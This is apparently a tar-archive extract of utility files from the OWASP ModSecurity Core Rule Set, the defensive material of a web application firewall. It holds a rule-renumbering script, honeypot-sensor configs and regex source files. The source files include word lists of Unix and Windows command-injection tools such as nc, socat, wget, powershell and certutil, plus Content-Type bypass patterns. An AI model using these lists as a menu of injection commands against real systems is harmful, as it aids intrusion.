(idNumbering.csv) \ please place this is the same directory as this script\n") sys.exit(1) parser = argparse.ArgumentParser(description="A program that takes in an exceptions file \ and renumbers all the ID to match OWASP CRS 3 numbers. Output will be directed to STDOUT.") parser.add_argument("-f", "--file", required=True, action="store", dest="fname", \ help="the file to be renumbered") args = parser.parse_args() if not os.path.isfile((args.fname).encode('utf8')): sys.stderr.write("We were unable to find the file you were trying to update the ID numbers \ in, please check your path\n") sys.exit(1) fcontent = "" try: update_file = open((args.fname).encode('utf-8'), "r") try: fcontent = update_file.read() finally: update_file.close() except IOError: sys.stderr.write("There was an error opening the file you were trying to update") if fcontent != "": # CSV File id_csv_file = open(id_translation_file, 'rt') try: reader = csv.reader(id_csv_file) for row in reader: fcontent = fcontent.replace(row[0], row[1]) finally: id_csv_file.close() print(fcontent) if __name__ == "__main__": main() ���������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������modsecurity-crs-3.3.5/util/geo-location/������������������������������������������������������������0000775�0000000�0000000�00000000000�14461225151�0020214�5����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������modsecurity-crs-3.3.5/util/geo-location/README������������������������������������������������������0000664�0000000�0000000�00000000623�14461225151�0021075�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������License The GeoLite databases are distributed under the Creative Commons Attribution-ShareAlike 3.0 Unported License. The attribution requirement may be met by including the following in all advertising and documentation mentioning features of or use of this database: This product includes GeoLite data created by MaxMind, available from http://www.maxmind.com. �������������������������������������������������������������������������������������������������������������modsecurity-crs-3.3.5/util/honeypot-sensor/���������������������������������������������������������0000775�0000000�0000000�00000000000�14461225151�0021010�5����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������modsecurity-crs-3.3.5/util/honeypot-sensor/README.md������������������������������������������������0000664�0000000�0000000�00000001136�14461225151�0022270�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������The purpose of these files is to turn your current ModSecurity host into a pseudo-honeypot sensor by doing the following: 1. Instructs Apache to listen for traffic on multiple unused ports - 8000 - 8080 - 8888 2. Creates Apache virtual host containers to bind to these ports. 3. If any traffic is received on these ports, then ModSecurity will inspect the traffic by inheriting any rules specified in the main Apache configuration. 4. ModSecurity's Audit Engine will use the mlogc program to forward the audit log entry onto the ModSecurity Project's central logging server. ����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������modsecurity-crs-3.3.5/util/honeypot-sensor/mlogc-honeypot-sensor.conf�������������������������������0000664�0000000�0000000�00000006731�14461225151�0026141�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������########################################################################## # Required configuration # At a minimum, the items in this section will need to be adjusted to # fit your environment. The remaining options are optional. ########################################################################## # Points to the root of the installation. All relative # paths will be resolved with the help of this path. CollectorRoot "/var/log/mlogc" # ModSecurity Console receiving URI. You can change the host # and the port parts but leave everything else as is. ConsoleURI "http://204.13.200.239/rpc/auditLogReceiver" # Sensor credentials SensorUsername "honeypot-sensor" SensorPassword "test1234" # Base directory where the audit logs are stored. This can be specified # as a path relative to the CollectorRoot, or a full path. LogStorageDir "data" # Transaction log will contain the information on all log collector # activities that happen between checkpoints. The transaction log # is used to recover data in case of a crash (or if Apache kills # the process). TransactionLog "mlogc-transaction.log" # The file where the pending audit log entry data is kept. This file # is updated on every checkpoint. QueuePath "mlogc-queue.log" # The location of the error log. ErrorLog "mlogc-error.log" # The location of the lock file. LockFile "mlogc.lck" # Keep audit log entries after sending? (0=false 1=true) # NOTE: This is required to be set in SecAuditLog mlogc config if you # are going to use a secondary console via SecAuditLog2. KeepEntries 0 ########################################################################## # Optional configuration ########################################################################## # The error log level controls how much detail there # will be in the error log. The levels are as follows: # 0 - NONE # 1 - ERROR # 2 - WARNING # 3 - NOTICE # 4 - DEBUG # 5 - DEBUG2 # ErrorLogLevel 3 # How many concurrent connections to the server # are we allowed to open at the same time? Log collector uses # multiple connections in order to speed up audit log transfer. # This is especially needed when the communication takes place # over a slow link (e.g. not over a LAN). MaxConnections 10 # How many requests a worker will process before recycling itself. # This is to help prevent problems due to any memory leaks that may # exists. If this is set to 0, then no maximum is imposed. The default # is 1000 requests per worker (the number of workers is controlled by the # MaxConnections limit). MaxWorkerRequests 1000 # The time each connection will sit idle before being reused, # in milliseconds. Increase if you don't want ModSecurity Console # to be hit with too many log collector requests. TransactionDelay 50 # The time to wait before initialization on startup in milliseconds. # Increase if mlogc is starting faster then termination when the # sensor is reloaded. StartupDelay 5000 # How often is the pending audit log entry data going to be written # to a file. The default is 15 seconds. CheckpointInterval 15 # If the server fails all threads will back down until the # problem is sorted. The management thread will periodically # launch a thread to test the server. The default is to test # once in 60 seconds. ServerErrorTimeout 60 # The following two parameters are not used yet, but # reserved for future expansion. # KeepAlive 150 # KeepAliveTimeout 300 ���������������������������������������modsecurity-crs-3.3.5/util/honeypot-sensor/modsecurity_crs_10_honeypot.conf�������������������������0000664�0000000�0000000�00000001703�14461225151�0027323�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������# # Add in honeypot ports. # - These are common proxy ports used by attackers # - All traffic accepted on these ports are suspicious. # Listen 8000 Listen 8080 Listen 8888 # # Create basic virtual host containers that will forward all traffic received # to the official ModSecurity Project honeypot logging host. # # - You should adjust the Document root location to an empty directory on your server # - Also adjust the path to your local ModSecurity mlogc program and for the # mlogc-honeypot-sensor.conf file. # - Make sure you main SecAuditLogType is set to concurrent mode. # ServerName www.example1.com DocumentRoot "/usr/local/apache/honeypot-htdocs" Options none AllowOverride None Order allow,deny Allow from all SecAuditEngine On SecAuditLog "|/usr/local/apache/bin/mlogc /usr/local/apache/conf/mlogc-honeypot-sensor.conf" �������������������������������������������������������������modsecurity-crs-3.3.5/util/id-range�����������������������������������������������������������������0000664�0000000�0000000�00000000036�14461225151�0017244�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������900000-2999999 2000000-299999 ��������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������modsecurity-crs-3.3.5/util/join-multiline-rules/����������������������������������������������������0000775�0000000�0000000�00000000000�14461225151�0021723�5����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������modsecurity-crs-3.3.5/util/join-multiline-rules/join.py���������������������������������������������0000775�0000000�0000000�00000002445�14461225151�0023244�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������#!/usr/bin/env python # # This script reads all the rule files passed on the command line, # and outputs them, with each (multi-line) directive joined as a # single line. # # This can be used to work around a bug in Apache < 2.4.11 in # parsing long configuration directives. # # Usage: # # util/join-multiline-rules/join.py rules/*.conf > rules/rules.conf.joined # # This produces a single 'rules.conf.joined' file that can be included # in buggy Apache versions. It is recommended to keep this file in the # rules/ directory (because it refers to .data files in that directory) # but give it a name not ending in .conf (so the file will not be # included in *.conf and you can re-run the command multiple times # without including its own output). # # Example: # # SecRule &TX:paranoia_level "@eq 0" \ # "id:901120,\ # phase:1,\ # pass,\ # nolog,\ # setvar:tx.paranoia_level=1" # # will be outputted as: # # SecRule &TX:paranoia_level "@eq 0" "id:901120,phase:1,pass,nolog,setvar:tx.paranoia_level=1" # import fileinput, sys for line in fileinput.input(): line = line.strip() if line == '': sys.stdout.write("\n") continue if line[-1] == '\\': sys.stdout.write(line[0:-1]) else: sys.stdout.write(line) sys.stdout.write("\n") ���������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������modsecurity-crs-3.3.5/util/regexp-assemble/���������������������������������������������������������0000775�0000000�0000000�00000000000�14461225151�0020717�5����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������modsecurity-crs-3.3.5/util/regexp-assemble/920600.data����������������������������������������������0000664�0000000�0000000�00000004777�14461225151�0022331�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������##! Please refer to the documentation at ##! https://coreruleset.org/docs/development/regexp_assemble/. ##! The expression generated from this file matches a full HTTP ##! `Accept` header by following the specification as far as ##! necessary, while restricting the `charset` parameter ##! to a list of explicitly allowed values. ##! Where possible, the expression matches tokens "loosely", ##! to reduce complexity and the risk of false positives. ##! Specifications: ##! https://httpwg.org/specs/rfc7231.html#request.conneg ##! https://httpwg.org/specs/rfc7230.html ##!^ ^ ##!$ $ ##! Helpers ##!> template non-token-with-dquote-chars (),/:;<=>?![\x5c\]{} ##!> template non-token-chars \"{{non-token-with-dquote-chars}} ##!> template token-chars [^{{non-token-chars}}] ##!> template token-with-dquote-chars [^{{non-token-with-dquote-chars}}] ##!> template type-subtype (?:\*|{{token-chars}}+) ##!> template media-type {{type-subtype}}/{{type-subtype}} ##! list of allowed charsets ##!> assemble (?:"? ##!=> ##!> include allowed-charsets ##!=> \b"?)) ##!=< allowed-charsets ##!< ##! Main assembly ##!> assemble (?:{{media-type}}) ##!=> (?:\s*+;\s*+ ##!=> (?:(?:charset\s*+=\s*+ ##!=> ##!=> allowed-charsets ##! If the first part wasn't a "charset", then ##! anything is allowed here that is not "charset". ##! Note that this doesn't follow the RFC strictly. |(?: ##!=> [^c{{non-token-chars}}]{{token-chars}}* c[^h{{non-token-chars}}]{{token-chars}}* ch[^a{{non-token-chars}}]{{token-chars}}* cha[^r{{non-token-chars}}]{{token-chars}}* char[^s{{non-token-chars}}]{{token-chars}}* chars[^e{{non-token-chars}}]{{token-chars}}* charse[^t{{non-token-chars}}]{{token-chars}}* ##!=> )\s*+=\s*+{{token-with-dquote-chars}}+) ##! Clients like to violate the RFC, be lenient with ##! terminating semi-colons. ;? ##!=> )* ##!=> ##! Multiple "media-range" expressions can be ##! specified, comma separated. (?:\s*+,\s*+ ##!=> (?:{{media-type}}) ##!=> (?:\s*+;\s*+ ##!=> (?:(?:charset\s*+=\s*+ ##!=> ##!=> allowed-charsets |(?: ##!=> [^c{{non-token-chars}}]{{token-chars}}* c[^h{{non-token-chars}}]{{token-chars}}* ch[^a{{non-token-chars}}]{{token-chars}}* cha[^r{{non-token-chars}}]{{token-chars}}* char[^s{{non-token-chars}}]{{token-chars}}* chars[^e{{non-token-chars}}]{{token-chars}}* charse[^t{{non-token-chars}}]{{token-chars}}* ##!=> )\s*+=\s*+{{token-with-dquote-chars}}+) ##! Clients like to violate the RFC, be lenient with ##! terminating semi-colons. ;? ##!=> )*)* ##!=> ##!< �modsecurity-crs-3.3.5/util/regexp-assemble/921421.data����������������������������������������������0000664�0000000�0000000�00000002000�14461225151�0022304�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������##! Please refer to the documentation at ##! https://coreruleset.org/docs/development/regexp_assemble/. ##! Attacks attempting bypass by forcing JSON body processor leveraging recommended rule 200000 ##! Find Content-Type: application/x-www-form-urlencoded;boundary="application/json" ##! Find Content-Type: application/soap+xml;boundary="application/json" ^[^;\s,]+[;\s,].*?application\/json ##! Attacks attempting bypass by forcing JSON body processor leveraging recommended rule 200006 ##! Find Content-Type: application/x-www-form-urlencoded;boundary="application/some.vendor+json" ##! Find Content-Type: application/soap+xml;boundary="application/some.vendor+json" ^[^;\s,]+[;\s,].*?application\/.+[+]json ##! Attacks attempting bypass by forcing XML body processor leveraging recommended rule 200001 ##! Find Content-Type: application/x-www-form-urlencoded;boundary="application/xml" ##! Find Content-Type: application/json;boundary="application/soap+xml" ^[^;\s,]+[;\s,].*?(?:application(?:\/soap\+|\/)|text\/)xml modsecurity-crs-3.3.5/util/regexp-assemble/921422.data����������������������������������������������0000664�0000000�0000000�00000001071�14461225151�0022314�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������##! Please refer to the documentation at ##! https://coreruleset.org/docs/development/regexp_assemble/. ##! Attacks attempting to bypass content-type restrictions or behaviour ##! Find Content-Type: application/x-www-form-urlencoded;boundary="multipart/form-data" ##! Find Content-Type: application/soap-xml;boundary="multipart/form-data" ^[^;\s,]+[;\s,].*?\b(text|multipart|application)\b ^[^;\s,]+[;\s,].*?\b(audio|image|video|csv|css|vnd|pdf|plain|json|soap|xml|x-www-form-urlencoded|form-data|related|x-amf|octet|stream|csp|report)\b ^[^;\s,]+[;\s,].*?\b(\/|\+)\b �����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������modsecurity-crs-3.3.5/util/regexp-assemble/922110-chain1.data���������������������������������������0000664�0000000�0000000�00000005270�14461225151�0023455�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������##! Please refer to the documentation at ##! https://coreruleset.org/docs/development/regexp_assemble/. ##! The expression generated from this file matches a full HTTP ##! `Accept` header by following the specification as far as ##! necessary, while restricting the `charset` parameter ##! to a list of explicitly allowed values. ##! Where possible, the expression matches tokens "loosely", ##! to reduce complexity and the risk of false positives. ##! Specifications: ##! https://httpwg.org/specs/rfc7231.html#request.conneg ##! https://httpwg.org/specs/rfc7230.html ##! This is a duplicate of the 920600.data file. ##! There will be support for inclusion in the regexp_assemble tool in the future. ##! In the meantime, please keep both files in sync. ##!^ ^ ##!$ $ ##! Helpers ##!> template non-token-with-dquote-chars (),/:;<=>?![\x5c\]{} ##!> template non-token-chars \"{{non-token-with-dquote-chars}} ##!> template token-chars [^{{non-token-chars}}] ##!> template token-with-dquote-chars [^{{non-token-with-dquote-chars}}] ##!> template type-subtype (?:\*|{{token-chars}}+) ##!> template media-type {{type-subtype}}/{{type-subtype}} ##! list of allowed charsets ##!> assemble (?:"? ##!=> ##!> include allowed-charsets ##!=> \b"?)) ##!=< allowed-charsets ##!< ##! Main assembly ##!> assemble (?:{{media-type}}) ##!=> (?:\s*+;\s*+ ##!=> (?:(?:charset\s*+=\s*+ ##!=> ##!=> allowed-charsets ##! If the first part wasn't a "charset", then ##! anything is allowed here that is not "charset". ##! Note that this doesn't follow the RFC strictly. |(?: ##!=> [^c{{non-token-chars}}]{{token-chars}}* c[^h{{non-token-chars}}]{{token-chars}}* ch[^a{{non-token-chars}}]{{token-chars}}* cha[^r{{non-token-chars}}]{{token-chars}}* char[^s{{non-token-chars}}]{{token-chars}}* chars[^e{{non-token-chars}}]{{token-chars}}* charse[^t{{non-token-chars}}]{{token-chars}}* ##!=> )\s*+=\s*+{{token-with-dquote-chars}}+) ##! Clients like to violate the RFC, be lenient with ##! terminating semi-colons. ;? ##!=> )* ##!=> ##! Multiple "media-range" expressions can be ##! specified, comma separated. (?:\s*+,\s*+ ##!=> (?:{{media-type}}) ##!=> (?:\s*+;\s*+ ##!=> (?:(?:charset\s*+=\s*+ ##!=> ##!=> allowed-charsets |(?: ##!=> [^c{{non-token-chars}}]{{token-chars}}* c[^h{{non-token-chars}}]{{token-chars}}* ch[^a{{non-token-chars}}]{{token-chars}}* cha[^r{{non-token-chars}}]{{token-chars}}* char[^s{{non-token-chars}}]{{token-chars}}* chars[^e{{non-token-chars}}]{{token-chars}}* charse[^t{{non-token-chars}}]{{token-chars}}* ##!=> )\s*+=\s*+{{token-with-dquote-chars}}+) ##! Clients like to violate the RFC, be lenient with ##! terminating semi-colons. ;? ##!=> )*)* ##!=> ##!< ����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������modsecurity-crs-3.3.5/util/regexp-assemble/include/�������������������������������������������������0000775�0000000�0000000�00000000000�14461225151�0022342�5����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������modsecurity-crs-3.3.5/util/regexp-assemble/include/allowed-charsets.data����������������������������0000664�0000000�0000000�00000000360�14461225151�0026435�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������##! Please refer to the documentation at ##! https://coreruleset.org/docs/development/regexp_assemble/. ##! This list is in sync with the default value of tx.allowed_request_content_type_charset. iso-8859-1 iso-8859-15 utf-8 windows-1252 ��������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������modsecurity-crs-3.3.5/util/regexp-assemble/regexp-932100.txt����������������������������������������0000664�0000000�0000000�00000003431�14461225151�0023507�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������# Word list for rule 932100 (RCE Unix command injection part 1/3) # # To convert to a regexp that can be pasted into the rule: # cat regexp-932100.txt | ./regexp-cmdline.py unix | ./regexp-assemble.pl # # Entries starting with ' are used verbatim. # Everything after # is a comment. # # To prevent some FP for a command, you can require command parameters # after a command. Only do this if the command regularly causes FP and if # allowing the bare command (without parameters) is not too dangerous. # (Note: due to \b following the regexp, a word boundary is also required # further on, so some letter/number is needed for a match). Example: # # diff+ # Special regexp case for the '.' (source) command to prevent FP: '\.\s.* 7z 7za 7zr adduser alias+ apt-get arch+ arp awk+ bash batch+ breaksw bsdcat bsdiff bsdtar builtin bzcat bzdiff bzegrep bzfgrep bzgrep bzip2 bzless bzmore cat+ cc+ chattr chdir+ chflags chmod command+ compress+ coproc cp+ crontab csh curl dash dhclient diff+ dmesg doas done dpkg du+ echo+ egrep endif endsw env env-update esac eval exec+ expand export expr fc+ fetch+ fgrep fi file+ filetest find+ foreach ftp+ ftpstats ftpwho function gcc+ gdb GET+ getfacl+ git+ grep+ gunzip gzcat gzip head+ history hostid hostname htdigest htpasswd hup+ # 'id' causes way too much FP, so we require whitespace; this will allow # injecting ';id' unfortunately. id+ ifconfig ip6tables ipconfig iptables irb irb1 irb18 irb19 irb20 irb21 irb22 java+ jexec jobs+ kill+ killall last+ lastcomm lastlog lastlogin ldconfig ldd+ less+ lessecho lessfile lesspipe lftp lftpget ln+ local+ locate+ logname lp+ ls ls-F lsb_release lscpu lshw lsmod lsof lspci lsusb lwp-download lwp-dump lwp-mirror lwp-request lynx+ lzcat lzcmp lzdiff lzegrep lzfgrep lzgrep lzless lzma lzmore mailq mailx+ mkdir+ mlocate more+ ���������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������modsecurity-crs-3.3.5/util/regexp-assemble/regexp-932105.txt����������������������������������������0000664�0000000�0000000�00000003431�14461225151�0023514�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������# Word list for rule 932105 (RCE Unix command injection part 2/3) # # To convert to a regexp that can be pasted into the rule: # cat regexp-932105.txt | ./regexp-cmdline.py unix | ./regexp-assemble.pl # # Entries starting with ' are used verbatim. # Everything after # is a comment. # # To prevent some FP for a command, you can require command parameters # after a command. Only do this if the command regularly causes FP and if # allowing the bare command (without parameters) is not too dangerous. # (Note: due to \b following the regexp, a word boundary is also required # further on, so some letter/number is needed for a match). Example: # # diff+ mount+ mutt+ mv+ mysql mysqladmin mysqldump mysqldumpslow mysqlhotcopy mysqlshow nano+ nc+ nc.openbsd nc.traditional ncat net+ netcat netkit-ftp netstat nice+ nmap nohup nping nslookup nstat onintr openssl passwd patch+ perl perl5 perlsh perms pftp pgrep php php5 php7 ping pkexec pkg pkg_info pkginfo pkill popd printenv printf+ ps+ ptar ptardiff ptargrep pushd python python2 python3 python3m rar+ rcp+ realpath rename+ repeat+ replace+ rm+ rmdir+ rmuser rnano route rpm+ rsync ruby ruby1 ruby18 ruby19 ruby20 ruby21 ruby22 sched scp+ sdiff sed+ sendmail set+ setenv setfacl+ setsid sftp sh+ sh.distrib shutdown sleep socat sort+ source+ ssh strings su+ sudo svn sysctl tail tailf tar+ tcping tcptraceroute tcsh tee+ telnet time+ timeout top touch+ traceroute traceroute6 ulimit+ uname uncompress unlink+ unlzma unrar unset unxz unzip useradd userdel usermod vigr vim+ vipw w3m wget # 'who' causes many FP, so require whitespace. # Unfortunately, without whitespace it may still leak some info. who+ whoami xargs xterm xxd+ xz+ xzcat xzcmp xzdec xzdiff xzegrep xzfgrep xzgrep xzless xzmore yum zcat zcmp zdiff zegrep zfgrep zgrep zip+ zless zmore zrun zsh ���������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������modsecurity-crs-3.3.5/util/regexp-assemble/regexp-932106.txt����������������������������������������0000664�0000000�0000000�00000001307�14461225151�0023515�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������# Word list for rule 932106 (RCE Unix command injection part 3/3) # # To convert to a regexp that can be pasted into the rule: # cat regexp-932106.txt | ./regexp-cmdline.py unix | ./regexp-assemble.pl # # # Entries starting with ' are used verbatim. # Everything after # is a comment. # # To prevent some FP for a command, you can require command parameters # after a command. Only do this if the command regularly causes FP and if # allowing the bare command (without parameters) is not too dangerous. # (Note: due to \b following the regexp, a word boundary is also required # further on, so some letter/number is needed for a match). Example: # # diff+ vi+ ps pwd who w+ aptitude+ pacman+ dnf+ up2date+ �������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������modsecurity-crs-3.3.5/util/regexp-assemble/regexp-932110.txt����������������������������������������0000664�0000000�0000000�00000003357�14461225151�0023517�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������# Word list for rule 932110 (RCE Windows command injection part 1/2) # # To convert to a regexp that can be pasted into the rule: # cat regexp-932110.txt | ./regexp-cmdline.py windows | ./regexp-assemble.pl # # Entries starting with ' are used verbatim. # Everything after # is a comment. # # To prevent some FP for a command, you can require command parameters # after a command. Only do this if the command regularly causes FP and if # allowing the bare command (without parameters) is not too dangerous. # (Note: due to \b following the regexp, a word boundary is also required # further on, so some letter/number is needed for a match). Example: # # diff@ 7z 7za 7zr addusers admodcmd arp@ assoc attrib azman bcdboot bcdedit bitsadmin bootcfg browstat cacls call@ certreq certutil #disabled for FP: change chdir@ chkdsk chkntfs cipher cleanmgr clearmem cluster cmd cmdkey comexp comp@ compact@ compmgmt con2prt convert copy csccmd cscript csvde curl date@ dcomcnfg debug defrag del@ delprof deltree devcon devmgmt diff@ dir@ diruse diskmgmt diskpart diskshadow dnsstat doskey driverquery dsacls dsadd dsget dsmod dsmove dsquery dsrm dxdiag echo egrep endlocal erase eventcreate eventvwr expand@ explorer fc@ fgrep find@ findstr foreach forfiles format@ freedisk fsmgmt fsutil ftp@ ftype gathernetworkinfo getmac git@ gpedit gpresult gpupdate hdwwiz hostname icacls ifmember inetcpl ipconfig irb irb1 irb18 irb19 irb20 irb21 irb22 java@ label@ logevent logman logoff logtime lusrmgr mapisend mbsacli md@ mdsched measure mkdir@ mklink mmsys mode@ more@ mount@ mountvol moveuser msconfig msg@ msiexec msinfo32 mstsc mysql mysqladmin mysqldump mysqldumpslow mysqlhotcopy mysqlshow nbtstat nc@ ncat net@ netcat netdom netsh netstat netsvc nmap nslookup ntbackup ntrights ���������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������modsecurity-crs-3.3.5/util/regexp-assemble/regexp-932115.txt����������������������������������������0000664�0000000�0000000�00000003536�14461225151�0023523�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������# Word list for rule 932115 (RCE Windows command injection part 2/2) # # To convert to a regexp that can be pasted into the rule: # cat regexp-932115.txt | ./regexp-cmdline.py windows | ./regexp-assemble.pl # # Entries starting with ' are used verbatim. # Everything after # is a comment. # # To prevent some FP for a command, you can require command parameters # after a command. Only do this if the command regularly causes FP and if # allowing the bare command (without parameters) is not too dangerous. # (Note: due to \b following the regexp, a word boundary is also required # further on, so some letter/number is needed for a match). Example: # # diff@ odbcad32 odbcconf openfiles path@ pathping perfmon perl perl5 perlsh php php5 php7 ping pkgmgr popd portqry powercfg powershell powershell_ise print@ printbrm prncnfg prnmngr prompt psexec psfile psgetsid psinfo pskill pslist psloggedon psloglist pspasswd psping psservice psshutdown pssuspend pushd python python2 python3 python3m qgrep qprocess query@ qwinsta rar@ rasdial rasphone rd@ recdisc recover reg@ regedit regini regsvr32 rekeywiz ren@ rename@ replace@ reset@ rm@ rmdir@ rmtshare robocopy route@ rstrui rsync ruby1 ruby18 ruby19 ruby20 ruby21 ruby22 runas rundll32 schtasks sclist secpol select set@ setlocal setx@ sfc share shellrunas shift shortcut showgrps showmbrs shrpubw shutdown sigverif sleep slmgr sort start@ subinacl subst svn sysdm syskey systeminfo systempropertiesadvanced systempropertiesdataexecutionprevention systempropertieshardware systempropertiesperformance takeown taskkill tasklist taskmgr taskschd telnet timeout tlist tpminit tracert tree tsdiscon tsshutdn type@ typeperf unrar unzip useraccountcontrolsettings usrstat verify vol@ waitfor wevtutil wget #disabled for FP: where@ whoami windiff winmsdp winrm winrs winvar wmic wmimgmt wscript wscui wuapp wuauclt wusa xcacls xcopy zip@ ������������������������������������������������������������������������������������������������������������������������������������������������������������������modsecurity-crs-3.3.5/util/regexp-assemble/regexp-932130.data���������������������������������������0000664�0000000�0000000�00000000057�14461225151�0023605�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������\$\(.*\) \$\{.*\} <\(.*\) >\(.*\) \$\(\(.*\)\) ���������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������modsecurity-crs-3.3.5/util/regexp-assemble/regexp-932140.data���������������������������������������0000664�0000000�0000000�00000000266�14461225151�0023610�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������\bfor(?:/[dflr].*)? %+[^ ]+ in\(.*\)\s?do \bif(?:/i)?(?: not)?(?: exist\b| defined\b| errorlevel\b| cmdextversion\b|(?: |\().*(?:\bgeq\b|\bequ\b|\bneq\b|\bleq\b|\bgtr\b|\blss\b|==)) ������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������modsecurity-crs-3.3.5/util/regexp-assemble/regexp-932150.txt����������������������������������������0000664�0000000�0000000�00000003125�14461225151�0023514�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������# Word list for rule 932150 (RCE Unix command injection) # To lower FP, this rule requires whitespace after a command. # # To convert to a regexp that can be pasted into the rule: # cat regexp-932150.txt | ./regexp-cmdline.py unix | ./regexp-assemble.pl # # Entries starting with ' are used verbatim. # Everything after # is a comment. # bash bsdcat bsdiff bsdtar builtin bzcat bzdiff bzegrep bzfgrep bzgrep bzless bzmore cc command coproc csh curl dash diff dmesg doas echo egrep env eval exec fetch fgrep filetest ftpstats ftpwho gcc GET grep gzcat gzip head hup irb irb1 irb18 irb19 irb20 irb21 irb22 java jobs -x lastcomm lastlog lastlogin lessecho lessfile lesspipe lftp lftpget ls ls-F lsb_release lscpu lsmod lsof lspci lsusb lwp lwp-download lynx lzcat lzcmp lzdiff lzegrep lzfgrep lzgrep lzless lzma lzmore mailq mlocate mysqladmin mysqldump mysqldumpslow mysqlhotcopy mysqlshow nc nc.openbsd nc.traditional ncat netcat netkit-ftp netstat nohup nping nstat onintr perl perl5 pftp pgrep php php5 php7 ping pkexec pkill popd printenv ptar ptardiff ptargrep python python2 python3 python3m rcp realpath rename repeat replace rmdir rmuser rnano rsync ruby ruby1 ruby18 ruby19 ruby20 ruby21 ruby22 sched scp sdiff sed sendmail setenv setsid sftp sh sh.distrib socat source ssh strings sudo svn sysctl tail tailf tar tcping tcptraceroute tcsh telnet time timeout traceroute traceroute6 uname uncompress unlzma unrar unset unxz unzip useradd userdel usermod vigr vipw w3m wget whoami xargs xz xzcat xzcmp xzdec xzdiff xzegrep xzfgrep xzgrep xzless xzmore zcat zcmp zdiff zegrep zfgrep zgrep zip zless zmore zrun zsh �������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������modsecurity-crs-3.3.5/util/regexp-assemble/regexp-933131.data���������������������������������������0000664�0000000�0000000�00000000362�14461225151�0023606�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������AUTH_TYPE HTTP_ACCEPT HTTP_ACCEPT_CHARSET HTTP_ACCEPT_ENCODING HTTP_ACCEPT_LANGUAGE HTTP_CONNECTION HTTP_HOST HTTP_KEEP_ALIVE HTTP_REFERER HTTP_USER_AGENT HTTP_X_FORWARDED_FOR ORIG_PATH_INFO PATH_INFO 